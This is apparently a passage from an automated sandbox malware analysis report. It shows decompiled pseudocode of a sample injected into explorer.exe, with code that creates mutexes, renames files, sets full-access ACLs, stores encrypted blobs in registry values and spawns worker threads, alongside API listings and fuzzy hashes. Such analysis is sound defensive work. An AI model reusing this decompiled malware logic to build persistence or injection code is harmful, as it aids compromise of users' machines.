                                          • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9E9
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InformationToken$AllocateErrorHeapLast
                                          • String ID:
                                          • API String ID: 2499131667-0
                                          • Opcode ID: e7776a111618df8e1eb6d3c21fda07cffef43c1b7da24d7cd6ef38b0e6b938d5
                                          • Instruction ID: d997e41f721a916132a1fdbd49b54382bda47c6799cd78954eaa02ec7e04328f
                                          • Opcode Fuzzy Hash: e7776a111618df8e1eb6d3c21fda07cffef43c1b7da24d7cd6ef38b0e6b938d5
                                          • Instruction Fuzzy Hash: A501A272601118BF9B209BA6DC4AEAF7FECDB457A1B10022AFA05D7111EB30DD0087B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000C590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
                                          				intOrPtr _t10;
                                          				void* _t13;
                                          				void* _t19;
                                          				signed int _t21;
                                          				signed int _t22;
                                          
                                          				_t13 = __edx;
                                          				if(__ecx != 0) {
                                          					_t22 = 0;
                                          					_t19 = CreateMutexA(0, 1, __ecx);
                                          					if(_t19 != 0) {
                                          						if(GetLastError() != 0xb7 || E000CA4BF(_t19, _t13) != 0xffffffff) {
                                          							_t22 = 1;
                                          							 *_a4 = _t19;
                                          						} else {
                                          							_t10 =  *0xde684; // 0x14cf8f0
                                          							 *((intOrPtr*)(_t10 + 0x30))(_t19);
                                          						}
                                          					} else {
                                          						GetLastError();
                                          						_t22 = 0xffffffff;
                                          					}
                                          				} else {
                                          					_t22 = _t21 | 0xffffffff;
                                          				}
                                          				return _t22;
                                          			}









                                          APIs
                                          • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5928
                                          • GetLastError.KERNEL32(?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5934
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateErrorLastMutex
                                          • String ID:
                                          • API String ID: 1925916568-0
                                          • Opcode ID: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
                                          • Instruction ID: d073c145edc5ca2aa73541b9c57a8b093e21ae94b269b6476e6d31558b2c847e
                                          • Opcode Fuzzy Hash: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
                                          • Instruction Fuzzy Hash: A1F02835601910CBD6A0175ADC84F3E7B98EB95772B51036AF969DB1E1CF34DC4443B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000CA471(CHAR* __ecx, void* __edx) {
                                          				intOrPtr _t8;
                                          				void* _t16;
                                          				void* _t17;
                                          
                                          				_t16 = __edx; // executed
                                          				_t17 = CreateMutexA(0, 1, __ecx);
                                          				if(_t17 != 0) {
                                          					if(GetLastError() == 0xb7 && E000CA4BF(_t17, _t16) < 0) {
                                          						_t8 =  *0xde684; // 0x14cf8f0
                                          						 *((intOrPtr*)(_t8 + 0x30))(_t17);
                                          						_t17 = 0;
                                          					}
                                          					return _t17;
                                          				}
                                          				GetLastError();
                                          				return 0;
                                          			}







                                          APIs
                                          • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,000C4E14,00000000), ref: 000CA47F
                                          • GetLastError.KERNEL32 ref: 000CA48B
                                          • GetLastError.KERNEL32 ref: 000CA495
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$CreateMutex
                                          • String ID:
                                          • API String ID: 200418032-0
                                          • Opcode ID: 77e21d80ee078d91a8c29d57bde9561238bcfa181556416213a9dbb61c26a2d7
                                          • Instruction ID: aa0b7b2252ede9d51be57bd9111e8f042ae3321c19d90ec579b42b1c7a2d6374
                                          • Opcode Fuzzy Hash: 77e21d80ee078d91a8c29d57bde9561238bcfa181556416213a9dbb61c26a2d7
                                          • Instruction Fuzzy Hash: 49F0ED313014249BE6252729E88CF5F3B99DFE9754F02446AFA09CB251EAACCC0643F2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E000C6DA0(void* __eflags, void* __fp0) {
                                          				short _v536;
                                          				WCHAR* _v544;
                                          				WCHAR* _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr _t11;
                                          				void* _t22;
                                          				void* _t32;
                                          				intOrPtr _t34;
                                          				intOrPtr _t35;
                                          				intOrPtr _t41;
                                          				intOrPtr _t43;
                                          				intOrPtr _t46;
                                          				intOrPtr _t49;
                                          				void* _t51;
                                          				void* _t53;
                                          				void* _t56;
                                          				WCHAR* _t59;
                                          				signed int _t60;
                                          				void* _t62;
                                          				void* _t63;
                                          				void* _t74;
                                          
                                          				_t74 = __fp0;
                                          				_t34 =  *0xde778; // 0x14cfc08
                                          				_t62 = (_t60 & 0xfffffff8) - 0x21c;
                                          				_t51 = 0x31;
                                          				_t32 = 1; // executed
                                          				_t9 = E000C9ED0(_t34, _t51); // executed
                                          				if(_t9 != 0) {
                                          					_t10 =  *0xde78c; // 0x0
                                          					_t66 = _t10;
                                          					if(_t10 == 0) {
                                          						_t49 =  *0xde688; // 0xf0000
                                          						_t10 = E000CEDCF(_t49 + 0xb0, _t51, _t66);
                                          						 *0xde78c = _t10;
                                          					}
                                          					_push(0);
                                          					_push(_t10);
                                          					_t11 =  *0xde688; // 0xf0000
                                          					_push(L"\\c");
                                          					_t9 = E000C92E5(_t11 + 0x438);
                                          					_t59 = _t9;
                                          					_t63 = _t62 + 0x10;
                                          					_v544 = _t59;
                                          					if(_t59 != 0) {
                                          						while(1) {
                                          							_t35 =  *0xde688; // 0xf0000
                                          							_t56 = E000CA471(_t35 + 0x1878, 0x1388);
                                          							if(_t56 == 0) {
                                          								break;
                                          							}
                                          							if(E000CB269(_t59) == 0) {
                                          								_t32 = E000CF14F(_t59, 0x1388, _t74);
                                          							}
                                          							E000CA4DB(_t56);
                                          							_t41 =  *0xde684; // 0x14cf8f0
                                          							 *((intOrPtr*)(_t41 + 0x30))(_t56);
                                          							if(_t32 > 0) {
                                          								E000C980C( &_v544);
                                          								_t43 =  *0xde778; // 0x14cfc08
                                          								_t53 = 0x33;
                                          								if(E000C9ED0(_t43, _t53) != 0) {
                                          									L12:
                                          									__eflags = E000C1C68(_t59, __eflags, _t74);
                                          									if(__eflags >= 0) {
                                          										E000CB1B1(_t59, _t53, __eflags, _t74);
                                          										continue;
                                          									}
                                          								} else {
                                          									_t46 =  *0xde778; // 0x14cfc08
                                          									_t53 = 0x12;
                                          									_t22 = E000C9ED0(_t46, _t53);
                                          									_t72 = _t22;
                                          									if(_t22 != 0 || E000CA4EF(_t53, _t72) != 0) {
                                          										_push(E000C980C(0));
                                          										E000C9640( &_v536, 0x104, L"%s.%u", _t59);
                                          										_t63 = _t63 + 0x14;
                                          										MoveFileW(_t59,  &_v536);
                                          										continue;
                                          									} else {
                                          										goto L12;
                                          									}
                                          								}
                                          							}
                                          							break;
                                          						}
                                          						_t9 = E000C861A( &_v544, 0xfffffffe);
                                          					}
                                          				}
                                          				return _t9;
                                          			}

























                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileMove
                                          • String ID: %s.%u
                                          • API String ID: 3562171763-1288070821
                                          • Opcode ID: e9ba16e1cd3f4fd01c2996ceb48579633d2dc54d44a3b4d243ad9e7627ad9786
                                          • Instruction ID: 16c242f961a16b44c7ea8ae58b162dabe7e8efe05d509a60da4a7651e3b0c8da
                                          • Opcode Fuzzy Hash: e9ba16e1cd3f4fd01c2996ceb48579633d2dc54d44a3b4d243ad9e7627ad9786
                                          • Instruction Fuzzy Hash: 07318B753053509AE664FB65DC8AFAE339ADB90754F14002EFA058B2C3EF2AD905C762
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E000C2AEA() {
                                          				intOrPtr _v8;
                                          				signed int _v12;
                                          				CHAR* _v16;
                                          				signed int _t16;
                                          				intOrPtr _t21;
                                          				intOrPtr _t22;
                                          				void* _t26;
                                          				void* _t29;
                                          				signed int _t31;
                                          				intOrPtr _t36;
                                          				CHAR* _t38;
                                          				intOrPtr _t39;
                                          				void* _t40;
                                          
                                          				_t15 =  *0xde710 * 0x64;
                                          				_t39 = 0;
                                          				_v12 =  *0xde710 * 0x64;
                                          				_t16 = E000C8604(_t15);
                                          				_t38 = _t16;
                                          				_v16 = _t38;
                                          				if(_t38 != 0) {
                                          					_t31 =  *0xde710; // 0x2
                                          					_t36 = 0;
                                          					_v8 = 0;
                                          					if(_t31 == 0) {
                                          						L9:
                                          						_push(_t38);
                                          						E000C9F48(0xe); // executed
                                          						E000C861A( &_v16, _t39);
                                          						return 0;
                                          					}
                                          					_t29 = 0;
                                          					do {
                                          						_t21 =  *0xde714; // 0x14af5b0
                                          						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
                                          							if(_t39 != 0) {
                                          								lstrcatA(_t38, "|");
                                          								_t39 = _t39 + 1;
                                          							}
                                          							_t22 =  *0xde714; // 0x14af5b0
                                          							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
                                          							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
                                          							_t26 = E000C9601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
                                          							_t31 =  *0xde710; // 0x2
                                          							_t40 = _t40 + 0x18;
                                          							_t36 = _v8;
                                          							_t39 = _t39 + _t26;
                                          						}
                                          						_t36 = _t36 + 1;
                                          						_t29 = _t29 + 0x20;
                                          						_v8 = _t36;
                                          					} while (_t36 < _t31);
                                          					goto L9;
                                          				}
                                          				return _t16 | 0xffffffff;
                                          			}

















                                          APIs
                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                          • lstrcatA.KERNEL32(00000000,000DB9A0,000C573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,000C573E), ref: 000C2B3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeaplstrcat
                                          • String ID: %u;%u;%u
                                          • API String ID: 3011335133-2973439046
                                          • Opcode ID: 3ed37b67dce4f13b35f758d7024069cdf9e40f50b9608239a56521b6dd9233e4
                                          • Instruction ID: c18da029e8387f57c48651e8e1138d8feb965970a6bd18960df813de622e7610
                                          • Opcode Fuzzy Hash: 3ed37b67dce4f13b35f758d7024069cdf9e40f50b9608239a56521b6dd9233e4
                                          • Instruction Fuzzy Hash: A4110632A01304ABDB14EFA9DCC5E9E7BB9EB84324B10446EE900DB191CB349D00CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E000CBD10() {
                                          				char _v8;
                                          				void* _v12;
                                          				char _v16;
                                          				short _v20;
                                          				char _v24;
                                          				short _v28;
                                          				char _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				intOrPtr _v76;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				void _v96;
                                          				intOrPtr _t58;
                                          				intOrPtr _t61;
                                          				intOrPtr _t63;
                                          				intOrPtr _t65;
                                          				intOrPtr _t67;
                                          				intOrPtr _t70;
                                          				intOrPtr _t73;
                                          				intOrPtr _t77;
                                          				intOrPtr _t79;
                                          				intOrPtr _t81;
                                          				intOrPtr _t85;
                                          				intOrPtr _t87;
                                          				signed int _t90;
                                          				void* _t92;
                                          				intOrPtr _t93;
                                          				void* _t98;
                                          
                                          				_t90 = 8;
                                          				_v28 = 0xf00;
                                          				_v32 = 0;
                                          				_v24 = 0;
                                          				memset( &_v96, 0, _t90 << 2);
                                          				_v20 = 0x100;
                                          				_push( &_v12);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_v16 = 0;
                                          				_push(0);
                                          				_v8 = 0;
                                          				_push(1);
                                          				_v12 = 0;
                                          				_push( &_v24);
                                          				_t58 =  *0xde68c; // 0x14cfab8
                                          				_t98 = 0;
                                          				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
                                          					L14:
                                          					if(_v8 != 0) {
                                          						_t67 =  *0xde68c; // 0x14cfab8
                                          						 *((intOrPtr*)(_t67 + 0x10))(_v8);
                                          					}
                                          					if(_v12 != 0) {
                                          						_t65 =  *0xde68c; // 0x14cfab8
                                          						 *((intOrPtr*)(_t65 + 0x10))(_v12);
                                          					}
                                          					if(_t98 != 0) {
                                          						_t63 =  *0xde684; // 0x14cf8f0
                                          						 *((intOrPtr*)(_t63 + 0x34))(_t98);
                                          					}
                                          					if(_v16 != 0) {
                                          						_t61 =  *0xde684; // 0x14cf8f0
                                          						 *((intOrPtr*)(_t61 + 0x34))(_v16);
                                          					}
                                          					L22:
                                          					return _t98;
                                          				}
                                          				_v68 = _v12;
                                          				_t70 =  *0xde688; // 0xf0000
                                          				_t92 = 2;
                                          				_v96 = 0x1fffff;
                                          				_v92 = 0;
                                          				_v88 = 3;
                                          				_v76 = 0;
                                          				_v72 = 5;
                                          				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
                                          					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
                                          						goto L7;
                                          					}
                                          					goto L4;
                                          				} else {
                                          					L4:
                                          					_push( &_v8);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(1);
                                          					_push(_t92);
                                          					_push(_t92);
                                          					_push( &_v32);
                                          					_t85 =  *0xde68c; // 0x14cfab8
                                          					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
                                          						goto L14;
                                          					} else {
                                          						_t87 = _v8;
                                          						if(_t87 != 0) {
                                          							_push(2);
                                          							_pop(1);
                                          							_v64 = 0x1fffff;
                                          							_v60 = 1;
                                          							_v56 = 3;
                                          							_v44 = 0;
                                          							_v40 = 1;
                                          							_v36 = _t87;
                                          						}
                                          						L7:
                                          						_push( &_v16);
                                          						_push(0);
                                          						_push( &_v96);
                                          						_t73 =  *0xde68c; // 0x14cfab8
                                          						_push(1); // executed
                                          						if( *((intOrPtr*)(_t73 + 8))() != 0) {
                                          							goto L14;
                                          						}
                                          						_t98 = LocalAlloc(0x40, 0x14);
                                          						if(_t98 == 0) {
                                          							goto L14;
                                          						}
                                          						_t93 =  *0xde68c; // 0x14cfab8
                                          						_push(1);
                                          						_push(_t98);
                                          						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
                                          							goto L14;
                                          						}
                                          						_t77 =  *0xde68c; // 0x14cfab8
                                          						_push(0);
                                          						_push(_v16);
                                          						_push(1);
                                          						_push(_t98);
                                          						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
                                          							goto L14;
                                          						}
                                          						if(_v8 != 0) {
                                          							_t81 =  *0xde68c; // 0x14cfab8
                                          							 *((intOrPtr*)(_t81 + 0x10))(_v8);
                                          						}
                                          						_t79 =  *0xde68c; // 0x14cfab8
                                          						 *((intOrPtr*)(_t79 + 0x10))(_v12);
                                          						goto L22;
                                          					}
                                          				}
                                          			}







































                                          APIs
                                          • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 000CBDF7
                                          • LocalAlloc.KERNEL32(00000040,00000014), ref: 000CBE02
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocEntriesLocal
                                          • String ID:
                                          • API String ID: 2146116654-0
                                          • Opcode ID: 1d99a57611baaec703b87adae8a6e6c7168fee3c9c6b929967c5ce84b8f1f07f
                                          • Instruction ID: fb9cf3d49498b04ba18fc6af388e3f93cc6b6c7a00e5ba42f1d92bd048f5cdbb
                                          • Opcode Fuzzy Hash: 1d99a57611baaec703b87adae8a6e6c7168fee3c9c6b929967c5ce84b8f1f07f
                                          • Instruction Fuzzy Hash: C5512B71901248EFDB20DF99D889FDDBBF8EF44700F15806AF605AB2A0D7748944CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E000CA0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
                                          				char* _v12;
                                          				char _v16;
                                          				int _v20;
                                          				signed int _v24;
                                          				intOrPtr _v28;
                                          				char* _v32;
                                          				char _v52;
                                          				char _v64;
                                          				char _v328;
                                          				char _v2832;
                                          				signed int _t48;
                                          				signed int _t49;
                                          				char* _t54;
                                          				long _t73;
                                          				long _t80;
                                          				long _t83;
                                          				intOrPtr _t84;
                                          				void* _t88;
                                          				char* _t89;
                                          				intOrPtr _t90;
                                          				void* _t103;
                                          				void* _t104;
                                          				char* _t106;
                                          				intOrPtr _t107;
                                          				char _t108;
                                          
                                          				_t48 = __ecx;
                                          				_t89 = __edx;
                                          				_v24 = __ecx;
                                          				if(_a4 == 0 || _a8 == 0) {
                                          					L13:
                                          					_t49 = _t48 | 0xffffffff;
                                          					__eflags = _t49;
                                          					return _t49;
                                          				} else {
                                          					_t115 = __edx;
                                          					if(__edx == 0) {
                                          						goto L13;
                                          					}
                                          					_t107 =  *((intOrPtr*)(__ecx + 0x108));
                                          					_push(_t107);
                                          					_t103 = 4;
                                          					_v12 = __edx;
                                          					_v28 = E000CD400( &_v12, _t103);
                                          					_t93 = _t107 + __edx;
                                          					E000D2301(_t107 + __edx,  &_v2832);
                                          					_t54 = E000D242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
                                          					_t108 = _a8;
                                          					_v12 = _t54;
                                          					_v20 = _t54 + 6 + _t108;
                                          					_t106 = E000C8604(_t54 + 6 + _t108);
                                          					_v32 = _t106;
                                          					if(_t106 != 0) {
                                          						 *_t106 = _a12;
                                          						_t16 =  &(_t106[6]); // 0x6
                                          						_t106[1] = 1;
                                          						_t106[2] = _t108;
                                          						E000C86E1(_t16, _a4, _t108);
                                          						_t21 = _t108 + 6; // 0x6
                                          						E000D22D3( &_v2832, _t21 + _t106, _v12);
                                          						_v16 = _t89;
                                          						_t90 = _v24;
                                          						_v12 =  *((intOrPtr*)(_t90 + 0x108));
                                          						_push( &_v52);
                                          						_t104 = 8;
                                          						E000CF490( &_v16, _t104);
                                          						E000CEAC1( &_v16,  &_v52, 0x14,  &_v328);
                                          						E000CEB2E(_t106, _v20,  &_v328);
                                          						_t73 = E000C9B0E(_t90);
                                          						_v12 = _t73;
                                          						__eflags = _t73;
                                          						if(_t73 != 0) {
                                          							E000C97A0(_v28,  &_v64, 0x10);
                                          							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
                                          							__eflags = _t80;
                                          							if(_t80 == 0) {
                                          								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
                                          								__eflags = _t83;
                                          								if(_t83 != 0) {
                                          									_push(0xfffffffc);
                                          									_pop(0);
                                          								}
                                          								_t84 =  *0xde68c; // 0x14cfab8
                                          								 *((intOrPtr*)(_t84 + 0x1c))(_a4);
                                          							} else {
                                          								_push(0xfffffffd);
                                          								_pop(0);
                                          							}
                                          							E000C861A( &_v12, 0xffffffff);
                                          						}
                                          						E000C861A( &_v32, 0);
                                          						return 0;
                                          					}
                                          					_t88 = 0xfffffffe;
                                          					return _t88;
                                          				}
                                          			}





























                                          APIs
                                            • Part of subcall function 000D242D: _ftol2_sse.MSVCRT ref: 000D248E
                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                          • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 000CA1DE
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeapOpen_ftol2_sse
                                          • String ID:
                                          • API String ID: 3756893521-0
                                          • Opcode ID: 2e96345b894416f03581f96fa21f1bef7d609ef5021c4115ced1ea1f279122d7
                                          • Instruction ID: 9aabb578f3ec898990dbc52fcad180c0f02837a836db019fe8de1ec4e559170f
                                          • Opcode Fuzzy Hash: 2e96345b894416f03581f96fa21f1bef7d609ef5021c4115ced1ea1f279122d7
                                          • Instruction Fuzzy Hash: B451B072A0021DBBCF10DF98DC85FDEBBB8AF05324F10826AF514AB191DB75A644CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E000C98EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _t45;
                                          				intOrPtr _t46;
                                          				intOrPtr _t48;
                                          				intOrPtr _t49;
                                          				void* _t52;
                                          				intOrPtr _t53;
                                          				intOrPtr _t54;
                                          				struct _SECURITY_ATTRIBUTES* _t58;
                                          				intOrPtr _t59;
                                          				intOrPtr _t61;
                                          				intOrPtr _t65;
                                          				intOrPtr _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr _t69;
                                          				struct _SECURITY_ATTRIBUTES* _t73;
                                          				intOrPtr _t74;
                                          				intOrPtr _t77;
                                          				intOrPtr _t78;
                                          				intOrPtr _t79;
                                          				intOrPtr _t82;
                                          				intOrPtr _t83;
                                          				void* _t86;
                                          				intOrPtr _t87;
                                          				intOrPtr _t89;
                                          				signed int _t92;
                                          				intOrPtr _t97;
                                          				intOrPtr _t98;
                                          				int _t106;
                                          				intOrPtr _t110;
                                          				signed int _t112;
                                          				signed int _t113;
                                          				void* _t115;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_v8 = __edx;
                                          				_v12 = __ecx;
                                          				_t77 =  *0xde76c; // 0x1e0
                                          				_t73 = 0;
                                          				if(E000CA4BF(_t77, 0x7530) >= 0) {
                                          					_t45 =  *0xde770; // 0x14af948
                                          					_t112 = 0;
                                          					_t106 = 0;
                                          					do {
                                          						_t78 =  *((intOrPtr*)(_t106 + _t45));
                                          						if(_t78 == 0) {
                                          							L6:
                                          							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
                                          								_t113 = _t112 << 5;
                                          								if(_v8 == _t73) {
                                          									 *(_t113 + _t45 + 0x10) = _t73;
                                          									_t46 =  *0xde770; // 0x14af948
                                          									 *(_t113 + _t46 + 0xc) = _t73;
                                          									L14:
                                          									_t79 =  *0xde770; // 0x14af948
                                          									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
                                          									_t48 =  *0xde770; // 0x14af948
                                          									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
                                          									_t49 = E000CA471(0, 1);
                                          									_t82 =  *0xde770; // 0x14af948
                                          									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
                                          									_t83 =  *0xde770; // 0x14af948
                                          									_t30 = _t83 + _t113 + 4; // 0x14af94c
                                          									_t52 = CreateThread(_t73, _t73, E000C98A6, _t83 + _t113, _t73, _t30);
                                          									_t53 =  *0xde770; // 0x14af948
                                          									 *(_t113 + _t53) = _t52;
                                          									_t54 =  *0xde770; // 0x14af948
                                          									_t86 =  *(_t113 + _t54);
                                          									if(_t86 != 0) {
                                          										SetThreadPriority(_t86, 0xffffffff);
                                          										_t87 =  *0xde770; // 0x14af948
                                          										 *0xde774 =  *0xde774 + 1;
                                          										E000CA4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
                                          										_t74 =  *0xde770; // 0x14af948
                                          										_t73 = _t74 + _t113;
                                          									} else {
                                          										_t59 =  *0xde684; // 0x14cf8f0
                                          										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
                                          										_t61 =  *0xde770; // 0x14af948
                                          										_t37 = _t61 + 0xc; // 0x14af954
                                          										_t91 = _t37 + _t113;
                                          										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
                                          											E000C861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
                                          											_t61 =  *0xde770; // 0x14af948
                                          										}
                                          										_t92 = 8;
                                          										memset(_t113 + _t61, 0, _t92 << 2);
                                          									}
                                          									L19:
                                          									_t89 =  *0xde76c; // 0x1e0
                                          									E000CA4DB(_t89);
                                          									_t58 = _t73;
                                          									L20:
                                          									return _t58;
                                          								}
                                          								_t110 = _a4;
                                          								_t65 = E000C8604(_t110);
                                          								_t97 =  *0xde770; // 0x14af948
                                          								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
                                          								_t66 =  *0xde770; // 0x14af948
                                          								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
                                          									goto L19;
                                          								}
                                          								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
                                          								_t67 =  *0xde770; // 0x14af948
                                          								E000C86E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
                                          								_t115 = _t115 + 0xc;
                                          								goto L14;
                                          							}
                                          							goto L7;
                                          						}
                                          						_t69 =  *0xde684; // 0x14cf8f0
                                          						_push(_t73);
                                          						_push(_t78);
                                          						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
                                          							_t45 =  *0xde770; // 0x14af948
                                          							goto L7;
                                          						}
                                          						_t98 =  *0xde770; // 0x14af948
                                          						E000C984A(_t106 + _t98, 0);
                                          						_t45 =  *0xde770; // 0x14af948
                                          						goto L6;
                                          						L7:
                                          						_t106 = _t106 + 0x20;
                                          						_t112 = _t112 + 1;
                                          					} while (_t106 < 0x1000);
                                          					goto L19;
                                          				}
                                          				_t58 = 0;
                                          				goto L20;
                                          			}


                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b706d2afef1e48847738e5b56cd5bccf8843d61e69a5daf5c80532c9489298a2
                                          • Instruction ID: 3d3aa86b3fc97478f4b26c36f13bdb5f84f11f0de64e280aef22ffd0665b4c3f
                                          • Opcode Fuzzy Hash: b706d2afef1e48847738e5b56cd5bccf8843d61e69a5daf5c80532c9489298a2
                                          • Instruction Fuzzy Hash: 21517271615640DFD7A9FF28EC84D6AB7F9FB48314354892EE8468B361DB34E802CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E000C5631(void* __edx, void* __edi) {
                                          				char _v44;
                                          				void* _t8;
                                          				intOrPtr _t11;
                                          				intOrPtr _t14;
                                          				intOrPtr _t17;
                                          				intOrPtr _t18;
                                          				void* _t20;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t36;
                                          				void* _t39;
                                          				void* _t40;
                                          				intOrPtr _t49;
                                          				void* _t54;
                                          
                                          				_t54 = __edi;
                                          				_t8 = E000C9E66(0x3b); // executed
                                          				if(_t8 != 0xffffffff) {
                                          					L2:
                                          					E000C980C(0xde6c8);
                                          					_t39 = 0x37; // executed
                                          					E000C9F06(_t39);
                                          					_t11 =  *0xde688; // 0xf0000
                                          					_t40 = 0x3a; // executed
                                          					E000C9F06(_t40); // executed
                                          					E000CE4C1(_t63);
                                          					_t14 =  *0xde688; // 0xf0000
                                          					_t41 =  &_v44;
                                          					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
                                          					E000CA86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
                                          					_t17 =  *0xde684; // 0x14cf8f0
                                          					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0xde6c8,  *0xde6cc);
                                          					 *0xde74c = _t18;
